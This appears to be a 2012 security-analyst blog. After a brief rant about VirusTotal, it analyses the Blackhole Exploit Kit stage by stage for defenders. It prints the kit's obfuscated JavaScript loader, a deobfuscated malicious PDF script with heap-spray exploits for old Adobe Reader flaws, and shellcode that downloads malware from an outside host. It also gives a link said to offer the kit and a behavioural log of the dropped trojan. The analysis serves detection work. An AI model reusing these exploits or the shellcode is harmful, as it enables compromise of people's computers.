or...
Virus Totally undetected,
or...
Totally gone to shit,
or...
Fuck, you just made my job that much harder!
Anyways.. I had to rant.. enough embarrassment, besides.. "Blogging" is like graffiti with punctuation!
Now, onto the goods dammit!
In the past, VirusTotal provided a unique feature that would scan the domain of a URL and then grab the associated file type the web-server was offering up. For example:
hxxp://www.thisisabadfile.com/bad/file/virus.exe
VirusTotal would scan the domain: thisisabadfile
Then
VirusTotal would simultaneously scan the file: virus.exe
This provided a great way to analyze files and domains.
However, this feature no longer exists.
VirusTotal has moved their services to the cloud and domain/file checking is no longer rolled into one operation.
VirusTotal forces the user to "Upload" a file to use this functionality.
For security analysts on a secure network segment, they can not always pull down or obtain a copy/sample of the malicious/suspected file to submit.
Tisk tisk VT.. I've lost faith.. Hopefully you fix this!
To be continued..
Monday, January 30, 2012
Monday, January 16, 2012
Would you like to Block All Drive-by-Download Exploits
This will be a short and sweet post but I have reason to believe these guys over at "BLADE" are doing amazing work at combating drive-by exploits and malware.
Check out the following:
http://www.blade-defender.org/
Thanks!
Check out the following:
http://www.blade-defender.org/
Thanks!
Thursday, January 12, 2012
The Blackhole Exploit Kit
The following document will provide a detailed overview and in depth analysis of the Blackhole Exploit Kit. This document will also provide an understanding of the techniques, methods, and technical overview for security professionals and infosec analysts. The creation of this document will explain how to accurately identify communication between internal source IP’s and malicious Blackhole Exploit Kit “GET” requests. The contents will thoroughly cover the stages from initial request, to exploit delivery, and the compromise of end user machines.
What is the Blackhole Exploit Kit?
A type of crime-ware Web application developed in Russia to help hackers take advantage of unpatched exploits in order to hack computers via malicious scripts planted on compromised websites. Unsuspecting users visiting these compromised sites would be redirected to a browser vulnerability-exploiting malware portal website in order to distribute banking Trojans or similar malware through the visiting computer.Blackhole Exploit Kits are based on PHP and a MySQL backend and incorporate support for exploiting the most widely used and vulnerable security flaws in order to provide hackers with the highest probability of successful exploitation. The kits typically target versions of the Windows operating systems and applications installed on Windows platforms. However, the Blackhole Exploit Kit provides the attacker with great functionality and flexibility. The attacker can fully customize and modify what exploits, vulnerabilities, operating systems, and devices they wish to take advantage of. There are several Blackhole Exploit Kit s designed to compromise i-Phones, i-Pads, the MacOS, and several versions of Linux. Typically within the SOC, we’ve observed the majority of the exploits targeting the Windows operating system, taking advantage of vulnerabilities in Flash, Shock Wave, and Adobe reader. These exploits and applications will be demonstrated later in this document.
The first Blackhole Exploit Kit appeared on the black market in August 2010 as a Web application available for sale on a subscription basis ($1,500 for an annual license). Newer releases and a free version of the Blackhole Exploit Kit have since appeared on warez download sites as well as the following website:
hxxp://www.multiupload.com/ZTZPEA9L5Y.
hxxp://www.multiupload.com/ZTZPEA9L5Y.
The Blackhole Exploit Kit uses several protection mechanisms such as:
- Integrated Antivirus based on an API of popular blackhats' AVCheck services
- Forms database of blacklists based on referrers and IP addresses including ranges to block access to the system
The kit's settings allow criminals to choose a language interface of either Russian or English, which suggests that this kit was developed in Russia, and to change name of the malicious payload file and parameters to make it undetectable by AVs. Exploits are encrypted with custom algorithms, which makes this pack difficult to analyze by AVs and generic de-obfuscation tools and services. The Black Hole exploit kit uses the Java OBE (Open Business Engine) toolkit to spread exploits and successfully load the malicious executable to the victim's machine. Once a victim follows the malicious Iframe, he will download a JAR file with an encoded URL parameter, and one of the classes of this JAR file will decode this parameter into a clear text URL. The URL will be concatenated with an HTTP GET parameter, which will be used in downloading other malicious payload files. The exploit kit is encrypted by the commercial php-cryptor, which makes the whole distribution very regulated and sophisticated. The kit is therefore only rented by the criminals and not sold like many others.
Below is a running list of vulnerabilities that have been used with the Black Hole exploit kit:
CVE-2010-1885 HCP
CVE-2010-1423 Java argument injection vulnerability in the URI handler in Java NPAPI plugin
CVE-2010-0886 Java Unspecified vulnerability in the Java Deployment Toolkit component in Oracle Java SE
CVE-2010-0842 Java JRE MixerSequencer Invalid Array Index Remote Code Execution Vulnerability
CVE-2010-0840 Java trusted Methods Chaining Remote Code Execution Vulnerability
CVE-2009-1671 Java buffer overflows in the Deployment Toolkit ActiveX control in deploytk.dll
CVE-2009-0927 Adobe Reader Collab GetIcon
CVE-2008-2992 Adobe Reader util.printf
CVE-2007-5659 Adobe Reader CollectEmailInfo
CVE-2006-0003 IE MDAC
Blackhole Exploit “GET” request?
The majority of Blackhole Exploit Kit “GET” requests have various similarities. You’ll notice in the below examples most of the malicious GET requests are PHP pages with query strings starting at the “?” delimiter and the page requests for: page=*************. | hxxp://yqriyclplu.dns05.com/main.php?page=c69bd02e93e6957c |
| hxxp://youthofthenationalists.com/main.php?page=6262b9195f9ee4c6 |
| hxxp://ymasuker.c0m.li/main.php?page=beceaa39e272bf3c |
| hxxp://xrgcryjutkdygkshh.cx.cc/forum.php?tp=4e6c4f8cec3579c9 |
The number of compromised websites hosting malicious Blackhole Exploit Kit code has greatly increased over the past eight months. There are numerous websites that are hosting this malicious code without their knowledge or consent. Typically end users are redirected using iFrames from the malicious websites that have been compromised. However, at the time of this writing I've has noticed an increase in the change of the communication profile. Currently, end users are being redirected from a completely different website and sent to the Blackhole Exploit Kit portal where previously they were sent directly to the “URLS” as seen above.
Blackhole Exploit Kit obfuscation:
Start of obfuscation:
<html><body><script>
null+function(){
c='createCommen';
}();
aa=(document[c.concat('t')]+'qwe').substr(2,4);
a=[null,new Array(90,
101,
89,
x57x48x94x101x58x10… continues for quite some time!
End of obfuscation:
if((aa=='ncti')||(aa=='ctio')||(aa=='unct')){w=String;}
md="a";
c='';
i=0;
s=a[4-3];
while(i!=s.length){
c=c+w["f"+"r"+"omCharCo"+"d"+'e'](s + 10);
i++;
}
e=eval;
e(c);
if((aa=='ncti')||(aa=='ctio')||(aa=='unct')){w=String;}
md="a";
c='';
i=0;
s=a[4-3];
while(i!=s.length){
c=c+w["f"+"r"+"omCharCo"+"d"+'e'](s + 10);
i++;
}
e=eval;
e(c);
Blackhole Exploit Kit de-obfuscation:
The Blackhole Exploit Kit obfuscation can be manually de-obfuscated after careful review of the code. The de-obfuscation is typically wrapped around an array and several variables. I’ve used malzilla for most the research and manual de-obfuscation provided in the analysis.
However, http://www.urlquery.net provides an excellent resource to automatically de-obfuscate the Blackhole Exploit Kit “version 1.2” GET requests.
After providing urlquery.net with a Blackhole Exploit Kit “GET” request, urlquery.net will return the results auto-magically. To view the sample output code from urlquery, please review the following website:
http://urlquery.net/report.php?id=15308Analysis of the de-ob’d Blackhole Exploit Kit:
The following is a snippet of the de-obfuscated code from the Blackhole Exploit Kit. This snippet of code is used to exploit the end users system. After reviewing the following code you will notice there are various attempts to exploit specific java versions and adobe readers. |
| Spl() - Sploit Function |
Stages of the Blackhole Exploit Kit:
Stage-1: Initial communication to the Blackhole Exploit Kit.
Many end users and source IPs that are actively communicating with known Blackhole Exploit Kit sites/urls but have not been passed to “Stage 2” for exploitation.
Let’s assume the end user’s user-agent string suffices for communication to the
Blackhole Exploit Kit, the end user will have cycled through the spl() chained functions which contain the java exploits and malicious .pdf files. For example, you’ll notice some version checking and shortly after the Blackhole Exploit Kit offers up a malicious .pdf file. Below, you will find the following strings from the spl() function that serve up the malicious .pdf file.
show_pdf ('./content/fdp1.php?f=25')
show_pdf ('./content/fdp2.php?f=25')
Stage-2: Version checking was successful and the end users browser and versions of installed application meet the requirements to successfully exploit the application and end user machine/sysetm. I consider "Stage-2" to be successful when an end user has successfully requested a shortened version of the url including the above .pdfs or .jar files contained with the spl() function.
You may review the malicious .pdf file by visiting the following link:
http://wepawet.iseclab.org/view.php?hash=c1b93adbf7ec963a8758cc2ed66f7536&type=jsYou'll notice instantly the submitted .pdf file is clearly malicious. Further review of the file determines it is riddled with shellcode, exploits, and callbacks!
Exploits
Name | Description | Reference |
Adobe getIcon | Stack-based buffer overflow in Adobe Reader and Acrobat via the getIcon method of a Collab object |
Deobfuscation results
Evals
· if (e("1"))bjsg = " %u8366%ufce4%u85fc%u75e4%ue934%u335f%u64c0%u408b%u8b30%u0c40%u708b%u561c%u768b%u3308%u66db %u5e8b%u033c%u3374%u812c%u15ee%uff10%ub8ff%u408b%uc330%u3946%u7506%u87fb%u2434%ue485%u5175 %uebe9%u514c%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%uadfc%uc503%udb33 %ube0f%u3810%u74f2%uc108%u0dcb%uda03%ueb40%u3bf1%u751f%u5ee6%u5e8b%u0324%u66dd%u0c8b%u8d4b %uec46%u54ff%u0c24%ud88b%udd03%u048b%u038b%uabc5%u595e%uebc3%uad53%u688b%u8020%u0c7d%u7433 %u9603%uf3eb%u688b%u8b08%u6af7%u5905%u98e8%uffff%ue2ff%ue8f9%u0000%u0000%u5058%u406a%uff68 %u0000%u5000%uc083%u5019%u8b55%u8bec%u105e%uc383%uff05%u68e3%u6e6f%u0000%u7568%u6c72%u546d %u16ff%uc483%u8b08%ue8e8%uff61%uffff%u02eb%u72eb%uec81%u0104%u0000%u5c8d%u0c24%u04c7%u7224 %u6765%uc773%u2444%u7604%u3372%uc732%u2444%u2008%u732d%u5320%uf868%u0000%uff00%u0c56%ue88b %uc933%uc751%u1d44%u7700%u6270%uc774%u1d44%u2e05%u6c64%uc66c%u1d44%u0009%u8a59%u04c1%u8830 %u1d44%u4104%u6a51%u6a00%u5300%u6a57%uff00%u1456%uc085%u1675%u006a%uff53%u0456%u006a%ueb83 %u530c%u56ff%u8304%u0cc3%u02eb%u13eb%u8047%u003f%ufa75%u8047%u003f%uc475%u006a%ufe6a%u56ff %ue808%ufe9c%uffff%u4e8e%uec0e%ufe98%u0e8a%u6f89%ubd01%uca33%u5b8a%uc61b%u7946%u1a36%u702f %u7468%u7074%u2f3a%u722f%u657a%u6b6c%u666b%u6e2e%u3373%u6e2e%u6d61%u2f65%u2e77%u6870%u3f70 %u3d66%u3631%u6526%u333d%u0000"; function ezvr(ra, qy){ while (ra.length * 2 < qy){ ra += ra; } ra = ra.substring(0, qy /2);return ra;} function bx(){var dkg=new Array();var vw=0x0c0c0c0c;var addr=0x400000;var payload=unescape(bjsg);var sc_len=payload.length*2;var qy=addr-(sc_len+0x38);var yarsp=une scape("%u9090%u9090");yarsp=ezvr(yarsp,qy);var count2=(vw-0x400000)/addr; for (var count = 0; count < count2; count ++ ){ dkg[count] = yarsp + payload; } var overflow = unescape("%u0c0c%u0c0c"); while (overflow.length < 44952){ overflow += overflow; } this .collabStore = Collab.collectEmailInfo({ subj : "", msg : overflow } ); } function printf(){ nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A"); var payload = unescape(bjsg); heapblock = nop + payload; bigblock = unescape("%u0A0A%u0A0A"); headersize = 20; spray = headersize + heapblock.length; while (bigblock.length < spray){ bigblock += bigblock; } fillblock = bigblock.substring(0, spray); block = bigblock.substring(0, bigblock.length - spray); while (block.length + spray < 0x40000){ block = block + block + fillblock; } mem = new Array(); for (i = 0; i < 1400; i ++ ){ mem[i] = block + heapblock; } var num = 129999999999999999998888888888888888888888888888888888888888888888888888888888888888888888 888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888 888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888 88888888888888888888888888; util.printf("%45000f", num); } function geticon(){ var arry = new Array(); if (app.doc.Collab.getIcon){ var payload = unescape(bjsg); var hWq500CN = payload.length * 2; var qy = 0x400000 - (hWq500CN + 0x38); var yarsp = unescape("%u9090%u9090"); yarsp = ezvr(yarsp, qy); var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000; for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y ++ ){ arry[vqcQD96y] = yarsp + payload; } var tUMhNbGw = unescape("%09"); while (tUMhNbGw.length < 0x4000){ tUMhNbGw += tUMhNbGw; } tUMhNbGw = "N." + tUMhNbGw; app.doc.Collab.getIcon(tUMhNbGw); } } aPlugins = app.plugIns; var sv = parseInt(app.viewerVersion.toString().charAt(0)); for (var i = 0; i < aPlugins.length; i ++ ){ if (aPlugins[i].name == "EScript"){ var lv = aPlugins[i].version; } } if ((lv == 9) || ((sv == 8) && (lv <= 8.12))){ geticon(); } else if (lv == 7.1){ printf(); } else if (((sv == 6) || (sv == 7)) && (lv < 7.11)){ bx(); } else if ((lv >= 9.1) || (lv <= 9.2) || (lv >= 8.13) || (lv <= 8.17)){ function a(){ util.printd("p@111111111111111111111111 : yyyy111", new Date()); } var h = app.plugIns; for (var f = 0; f < h.length; f ++ ){ if (h[f].name == "EScript"){ var i = h[f].version; } } if ((i > 8.12) && (i < 8.2)){ c = new Array(); var d = unescape("%u9090%u9090"); var e = unescape(bjsg); while (d.length <= 0x8000){ d += d; } d = d.substr(0, 0x8000 - e.length); for (f = 0; f < 2900; f ++ ){ c[f] = d + e; } a(); a(); try { this .media.newPlayer(null); } catch (e){ } a(); } }
(repeated 1 time)
· 1
(repeated 1 time)
Writes
No writes.
Network Activity
Requests
URL |
file://6646f.pdf |
ActiveX controls
- AcrobatJavaScript
Name | Arg0 | |
Methods | Collab.getIcon | 4e 2e 09 09 09 09 09 09 09 09 09 09 09 09 09 09 <br>09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 <br>09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 <br>other 16288 bytes<br>09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 <br>09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 <br>09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 <br>09 09 |
Shellcode
Hexadecimal | ASCII |
66 83 e4 fc fc 85 e4 75 34 e9 5f 33 c0 64 8b 40 30 8b 40 0c 8b 70 1c 56 8b 76 08 33 db 66 8b 5e 3c 03 74 33 2c 81 ee 15 10 ff ff b8 8b 40 30 c3 46 39 06 75 fb 87 34 24 85 e4 75 51 e9 eb 4c 51 56 8b 75 3c 8b 74 35 78 03 f5 56 8b 76 20 03 f5 33 c9 49 41 fc ad 03 c5 33 db 0f be 10 38 f2 74 08 c1 cb 0d 03 da 40 eb f1 3b 1f 75 e6 5e 8b 5e 24 03 dd 66 8b 0c 4b 8d 46 ec ff 54 24 0c 8b d8 03 dd 8b 04 8b 03 c5 ab 5e 59 c3 eb 53 ad 8b 68 20 80 7d 0c 33 74 03 96 eb f3 8b 68 08 8b f7 6a 05 59 e8 98 ff ff ff e2 f9 e8 00 00 00 00 58 50 6a 40 68 ff 00 00 00 50 83 c0 19 50 55 8b ec 8b 5e 10 83 c3 05 ff e3 68 6f 6e 00 00 68 75 72 6c 6d 54 ff 16 83 c4 08 8b e8 e8 61 ff ff ff eb 02 eb 72 81 ec 04 01 00 00 8d 5c 24 0c c7 04 24 72 65 67 73 c7 44 24 04 76 72 33 32 c7 44 24 08 20 2d 73 20 53 68 f8 00 00 00 ff 56 0c 8b e8 33 c9 51 c7 44 1d 00 77 70 62 74 c7 44 1d 05 2e 64 6c 6c c6 44 1d 09 00 59 8a c1 04 30 88 44 1d 04 41 51 6a 00 6a 00 53 57 6a 00 ff 56 14 85 c0 75 16 6a 00 53 ff 56 04 6a 00 83 eb 0c 53 ff 56 04 83 c3 0c eb 02 eb 13 47 80 3f 00 75 fa 47 80 3f 00 75 c4 6a 00 6a fe ff 56 08 e8 9c fe ff ff 8e 4e 0e ec 98 fe 8a 0e 89 6f 01 bd 33 ca 8a 5b 1b c6 46 79 36 1a 2f 70 68 74 74 70 3a 2f 2f 72 7a 65 6c 6b 6b 66 2e 6e 73 33 2e 6e 61 6d 65 2f 77 2e 70 68 70 3f 66 3d 31 36 26 65 3d 33 00 00 | f......u4._3.d.@ 0.@..p.V.v.3.f.^ <.t3,........@0. F9.u..4$..uQ..LQ V.u<.t5x..V.v... 3.IA....3....8.t ......@..;.u.^.^ $..f..K.F..T$... ........^Y..S..h ..}.3t.....h...j .Y............XP j@h....P...PU... ^......hon..hurl mT........a..... .r.......\$...$r egs.D$.vr32.D$.. -s.Sh.....V...3. Q.D..wpbt.D...dl l.D...Y...0.D..A Qj.j.SWj..V...u. j.S.V.j....S.V.. ......G.?.u.G.?. u.j.j..V.......N .......o..3..[.. Fy6./phttp://rze lkkf.ns3.name/w. php?f=16&e=3.. |
Malware
Additional (potential) malware:URL | Type | Hash | Analysis |
http://rzelkkf.ns3.name/w.php?f=16&e=3 | N/A | N/A |
Stage-3: Either java or the malicious .pdf file has successfully exploited the end user:
The malicious .pdf has been executed, exploited the vulnerable application, and performed a callback for additional malware.
The most important information regarding the analysis of the malicious .pdf file is the additional malware indication. Using a proxy such as Malzilla, we were able to send a request to the above url: “hxxp:// /rzelkkf.ns3.name/w.php?f=16&e=3” which clearly
delivers the Trojan/Rat etc.. The file we’ve received is disguised as a normal windows
file: calc.exe, fun.exe, notepad.exe, or in this scenario readme.exe. Behavioral Analysis of readme.exe
The following is a snippet from a capture using Process Monitor:| SUCCESS | ||
|---|---|---|
| TCP Send | alpha-orion:2322 -> 31.44.184.49:http | SUCCESS |
| TCP Receive | alpha-orion:2322 -> 31.44.184.49:http | SUCCESS |
| RegQueryKey | HKCU\Software\Classes | SUCCESS |
| RegOpenKey | HKCU\Software\Classes\MIME\Database\Content Type\text/html | NAME NOT FOUND |
| RegOpenKey | HKCR\MIME\Database\Content Type\text/html | SUCCESS |
| RegQueryKey | HKCR\MIME\Database\Content Type\text/html | SUCCESS |
| RegOpenKey | HKCU\Software\Classes\MIME\Database\Content Type\text/html | NAME NOT FOUND |
| RegQueryValue | HKCR\MIME\Database\Content Type\text/html\Extension | SUCCESS |
| CreateFile | C:\Users\alpha\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1V0DH5TZ\up[1].htm | SUCCESS |
| SetBasicInformationFile | C:\Users\alpha\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1V0DH5TZ\up[1].htm | SUCCESS |
| QueryBasicInformationFile | C:\Users\alpha\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1V0DH5TZ\up[1].htm | SUCCESS |
| CloseFile | C:\Users\alpha\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1V0DH5TZ\up[1].htm | SUCCESS |
| CreateFile | C:\Users\alpha\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1V0DH5TZ\up[1].htm | SUCCESS |
| QueryNetworkOpenInformationFile | C:\Users\alpha\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1V0DH5TZ\up[1].htm | SUCCESS |
| CloseFile | C:\Users\alpha\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1V0DH5TZ\up[1].htm | SUCCESS |
| CreateFile | C:\Users\alpha\Desktop\Malware\readme.exe | SUCCESS |
| QueryAttributeTagFile | C:\Users\alpha\Desktop\Malware\readme.exe | SUCCESS |
| QueryBasicInformationFile | C:\Users\alpha\Desktop\Malware\readme.exe | SUCCESS |
| CreateFile | C:\Users\alpha\AppData\Local\Temp | SUCCESS |
| SetRenameInformationFile | C:\Users\alpha\Desktop\Malware\readme.exe | SUCCESS |
| CloseFile | C:\Users\alpha\AppData\Local\Temp | SUCCESS |
| CloseFile | C:\Users\alpha\AppData\Local\Temp\BHCsBWQnNnvaBm.exe.tmp | SUCCESS |
| CreateFile | C:\Users\alpha\AppData\Local\Temp\BHCsBWQnNnvaBm.exe.tmp | SUCCESS |
| QueryAttributeTagFile | C:\Users\alpha\AppData\Local\Temp\BHCsBWQnNnvaBm.exe.tmp | SUCCESS |
| RegCreateKey | HKLM\System\CurrentControlSet\Control\Session Manager | REPARSE |
| RegCreateKey | HKLM\System\CurrentControlSet\Control\Session Manager | SUCCESS |
| RegQueryValue | HKLM\System\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations2 | NAME NOT FOUND |
| RegCloseKey | HKLM\System\CurrentControlSet\Control\Session Manager | SUCCESS |
| RegCreateKey | HKLM\System\CurrentControlSet\Control\Session Manager | REPARSE |
| RegCreateKey | HKLM\System\CurrentControlSet\Control\Session Manager | SUCCESS |
| RegQueryValue | HKLM\System\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations | NAME NOT FOUND |
| RegSetValue | HKLM\System\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations | SUCCESS |
| RegCloseKey | HKLM\System\CurrentControlSet\Control\Session Manager | SUCCESS |
| CloseFile | C:\Users\alpha\AppData\Local\Temp\BHCsBWQnNnvaBm.exe.tmp | SUCCESS |
| Thread Exit | SUCCESS | |
| RegCloseKey | HKLM\SOFTWARE\Policies | SUCCESS |
| RegCloseKey | HKCU\Software\Policies | SUCCESS |
| RegCloseKey | HKCU\Software | SUCCESS |
| RegCloseKey | HKLM\SOFTWARE | SUCCESS |
| RegCloseKey | HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings | SUCCESS |
| RegCloseKey | HKCU\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings | SUCCESS |
| RegCloseKey | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings | SUCCESS |
| RegCloseKey | HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | SUCCESS |
| RegCloseKey | HKLM\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN | SUCCESS |
| RegCloseKey | HKCU\Software\Microsoft\Internet Explorer\IETld | SUCCESS |
| RegCloseKey | HKCR\MIME\Database\Content Type\text/html | SUCCESS |
| RegCloseKey | HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer | SUCCESS |
| RegOpenKey | HKLM\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize | SUCCESS |
| RegQueryValue | HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles | NAME NOT FOUND |
| RegCloseKey | HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize | SUCCESS |
| Thread Exit | SUCCESS | |
| Thread Exit | SUCCESS | |
| Thread Exit | SUCCESS | |
| Thread Exit | SUCCESS | |
| Thread Exit | SUCCESS | |
| Thread Exit | SUCCESS | |
| Thread Exit | SUCCESS | |
| Thread Exit | SUCCESS | |
| Thread Exit | SUCCESS | |
| QueryNameInformationFile | C:\Users\alpha\AppData\Local\Temp\BHCsBWQ | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\winrnr.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\pnrpnsp.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\NapiNSP.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\npmproxy.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\rasadhlp.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\netprofm.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\FWPUCLNT.DLL | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\rasapi32.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\SensApi.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\rtutils.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\rasman.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\nlaapi.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\WSHTCPIP.DLL | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\ntmarta.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\winnsi.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\IPHLPAPI.DLL | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\version.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\rsaenh.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\dnsapi.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\wship6.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\mswsock.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\cryptsp.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\sspicli.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\cryptbase.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\RpcRtRemote.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\profapi.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\msasn1.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\crypt32.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\KernelBase.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\ole32.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\iertutil.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\msctf.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\Wldap32.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\ws2_32.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\lpk.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\imagehlp.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\nsi.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\imm32.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\user32.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\advapi32.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\kernel32.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\msvcrt.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\urlmon.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\rpcrt4.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\usp10.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\shell32.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\sechost.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\clbcatq.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\shlwapi.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\oleaut32.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\wininet.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\ntdll.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\gdi32.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\apisetschema.dll | SUCCESS |
| Process Exit | SUCCESS | |
| CloseFile | C:\Users\alpha\Desktop\Malware | SUCCESS |
| RegCloseKey | HKLM\System\CurrentControlSet\Control\Nls\Sorting\Versions | SUCCESS |
| RegCloseKey | HKLM\System\CurrentControlSet\Control\Session Manager | SUCCESS |
| RegCloseKey | HKLM | SUCCESS |
| CloseFile | C:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2 | SUCCESS |
| RegCloseKey | HKCU | SUCCESS |
| CloseFile | C:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2 | SUCCESS |
| RegCloseKey | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings | SUCCESS |
| RegCloseKey | HKLM\SOFTWARE\Policies | SUCCESS |
| RegCloseKey | HKCU\Software\Policies | SUCCESS |
| RegCloseKey | HKCU\Software | SUCCESS |
| RegCloseKey | HKLM\SOFTWARE | SUCCESS |
| CloseFile | C:\Users\alpha\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat | SUCCESS |
| CloseFile | C:\Users\alpha\AppData\Roaming\Microsoft\Windows\Cookies\index.dat | SUCCESS |
| CloseFile | C:\Users\alpha\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat | SUCCESS |
| RegCloseKey | HKLM\System\CurrentControlSet\services\WinSock2\Parameters\Protocol_Catalog9 | SUCCESS |
| RegCloseKey | HKLM\System\CurrentControlSet\services\WinSock2\Parameters\NameSpace_Catalog5 | SUCCESS |
| RegCloseKey | HKLM\SOFTWARE\Microsoft\Tracing\readme_RASAPI32 | SUCCESS |
| RegCloseKey | HKU | SUCCESS |
| RegCloseKey | HKLM\SOFTWARE\Microsoft\Tracing\readme_RASMANCS | SUCCESS |
| RegCloseKey | HKCU | SUCCESS |
| RegCloseKey | HKCU\Software\Classes | SUCCESS |
| RegCloseKey | HKCU\Software\Classes | SUCCESS |
| RegCloseKey | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | SUCCESS |
| RegCloseKey | HKCU\Software\Microsoft\Windows NT\CurrentVersion\Network\Location Awareness | SUCCESS |
| RegCloseKey | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | SUCCESS |
| RegCloseKey | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | SUCCESS |
| CloseFile | C:\Windows\System32\en-US\urlmon.dll.mui | SUCCESS |
| TCP Disconnect | alpha-orion:2322 -> 31.44.184.49:http | SUCCESS |
Conclusion:
The Blackhole Exploit Kit is highly customizable and very dangerous. The compromise of web-servers and the utilization of crime-ware kits is an on going adventure for computer hackers, baddies, and organized crime participants. Until under trained system administrators can securely protect their web-severs and programmers can produce secure code, you will continue to see a rise in this type of activity.
Thank you!
References:
Subscribe to:
Posts (Atom)